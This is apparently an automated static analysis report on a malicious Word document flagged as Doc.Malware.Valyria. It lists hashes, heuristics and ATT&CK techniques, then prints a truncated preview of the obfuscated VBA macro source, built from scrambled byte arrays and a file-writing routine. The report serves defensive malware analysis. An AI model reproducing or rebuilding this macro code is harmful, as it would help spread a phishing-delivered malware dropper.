Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e566db9e491fda7a…

MALICIOUS

Office (OLE)

Size: 82.0 KB
Created: 2018-04-18 22:29:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 92f1bb5aa4a1c6c8ac81cbfdc2b3698a
SHA-1: bd1e815dd492be3ff0ec54351fe61ce1b0e2a5af
SHA-256: e566db9e491fda7a5d28ffe9019be64b4d9bc75014bbe189a9dcb9d987856558
Risk Score: 170

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by multiple high-severity heuristics including OLE_VBA_MACROS, OLE_VBA_GETOBJ, and OLE_VBA_CALLBYNAME. The ClamAV detection name 'Doc.Malware.Valyria-6744156-0' strongly suggests a known malware variant. The VBA code, though truncated, uses obfuscated byte arrays and function calls, typical of malware attempting to download and execute a secondary payload. The presence of macros points to a likely initial access vector via spearphishing attachment.

Heuristics (6)

  • ClamAV: Doc.Malware.Valyria-6744156-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Valyria-6744156-0
  • VBA macros detected [medium, 3 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • GetObject call [high, OLE_VBA_GETOBJ]
    GetObject call
  • CallByName call [high, OLE_VBA_CALLBYNAME]
    CallByName call
  • Environ() call (env variable access) [low, OLE_VBA_ENVIRON]
    Environ() call (env variable access)
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 20439 bytes
SHA-256: 19c0e95b56bcfb9aafb75cb3c09f385a61256501eecb5fada9defff80d8d695c

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Frame1, 0, 0, MSForms, Frame"
Dim q96A779
Private Function tCFCA73(jA8DF, p2ED73)
tCFCA73 = jA8DF - (p2ED73 * (jA8DF \ p2ED73))
End Function
Private Function y3AECE(eF60932, cE0)
Open eF60932 For Output As #1
Print #1, cE0
Close #1
End Function
Sub mB20BEF()
Dim mE0C02(5) As Byte
mE0C02(4) = 67
mE0C02(3) = 66
mE0C02(0) = 65
mE0C02(1) = 53
mE0C02(5) = 48
mE0C02(2) = 69
Dim i00776(870) As Byte
i00776(93) = 122
i00776(83) = 60
i00776(610) = 241
i00776(182) = 158
i00776(242) = 187
i00776(834) = 244
i00776(770) = 30
i00776(773) = 242
i00776(246) = 141
i00776(731) = 146
i00776(803) = 106
i00776(471) = 57
i00776(814) = 112
i00776(768) = 120
i00776(738) = 54
i00776(342) = 33
i00776(477) = 118
i00776(101) = 73
i00776(680) = 190
i00776(254) = 221
i00776(469) = 160
i00776(141) = 87
i00776(445) = 182
i00776(736) = 171
i00776(470) = 161
i00776(420) = 86
i00776(305) = 117
i00776(220) = 204
i00776(257) = 193
i00776(407) = 39
i00776(621) = 209
i00776(725) = 135
i00776(318) = 143
i00776(652) = 90
i00776(844) = 190
i00776(187) = 229
i00776(560) = 224
i00776(233) = 25
i00776(283) = 13
i00776(271) = 187
i00776(829) = 118
i00776(40) = 55
i00776(586) = 82
i00776(783) = 164
i00776(397) = 55
i00776(672) = 205
i00776(497) = 144
i00776(658) = 229
i00776(343) = 217
i00776(32) = 175
i00776(266) = 246
i00776(19) = 43
i00776(847) = 15
i00776(426) = 241
i00776(662) = 143
i00776(700) = 180
i00776(325) = 171
i00776(630) = 210
i00776(348) = 23
i00776(790) = 194
i00776(95) = 92
i00776(476) = 93
i00776(518) = 113
i00776(551) = 13
i00776(344) = 26
i00776(43) = 2
i00776(202) = 32
i00776(552) = 195
i00776(177) = 234
i00776(76) = 200
i00776(457) = 217
i00776(18) = 136
i00776(565) = 76
i00776(453) = 158
i00776(219) = 20
i00776(749) = 150
i00776(540) = 81
i00776(742) = 229
i00776(591) = 28
i00776(322) = 70
i00776(291) = 52
i00776(688) = 81
i00776(65) = 110
i00776(308) = 64
i00776(657) = 254
i00776(442) = 232
i00776(583) = 171
i00776(484) = 1
i00776(641) = 152
i00776(0) = 236
i00776(375) = 146
i00776(615) = 14
i00776(846) = 58
i00776(167) = 191
i00776(595) = 144
i00776(243) = 58
i00776(126) = 209
i00776(616) = 196
i00776(519) = 94
i00776(230) = 252
i00776(705) = 194
i00776(593) = 221
i00776(56) = 74
i00776(761) = 253
i00776(270) = 164
i00776(665) = 141
i00776(185) = 3
i00776(84) = 175
i00776(33) = 34
i00776(356) = 112
i00776(406) = 58
i00776(229) = 248
i00776(606) = 226
i00776(47) = 191
i00776(608) = 20
i00776(517) = 188
i00776(561) = 174
i00776(482) = 219
i00776(139) = 100
i00776(312) = 71
i00776(427) = 254
i00776(859) = 85
i00776(217) = 192
i00776(837) = 90
i00776(54) = 74
i00776(285) = 7
i00776(522) = 146
i00776(320) = 130
i00776(807) = 111
i00776(548) = 23
i00776(341) = 52
i00776(396) = 112
i00776(653) = 213
i00776(841) = 151
i00776(474) = 33
i00776(713) = 136
i00776(855) = 140
i00776(485) = 176
i00776(260) = 46
i00776(392) = 16
i00776(527) = 84
i00776(475) = 220
i00776(421) = 29
i00776(186) = 178
i00776(597) = 174
i00776(146) = 130
i00776(613) = 167
i00776(314) = 9
i00776(162) = 167
i00776(712) = 237
i00776(785) = 216
i00776(60) = 217
i00776(9) = 68
i00776(417) = 93
i00776(174) = 212
i00776(865) = 239
i00776(570) = 185
i00776(804) = 161
i00776(225) = 216
i00776(191) = 42
i00776(720) = 172
i00776(205) = 188
i00776(850) = 245
i00776(35) = 210
i00776(372) = 59
i00776(402) = 85
i00776(638) = 65
i00776(856) = 17
i00776(781) = 13
i00776(228) = 98
i00776(585) = 74
i00776(580) = 199
i00776(735) = 64
i00776(626) = 74
i00776(247) = 222
i00776(404) = 67
i00776(394) = 26
i00776(816) = 102
i00776(307) = 134
i00776(45) = 247
i00776(299) = 242
i00776(479) = 192
i00776(840)
... (truncated)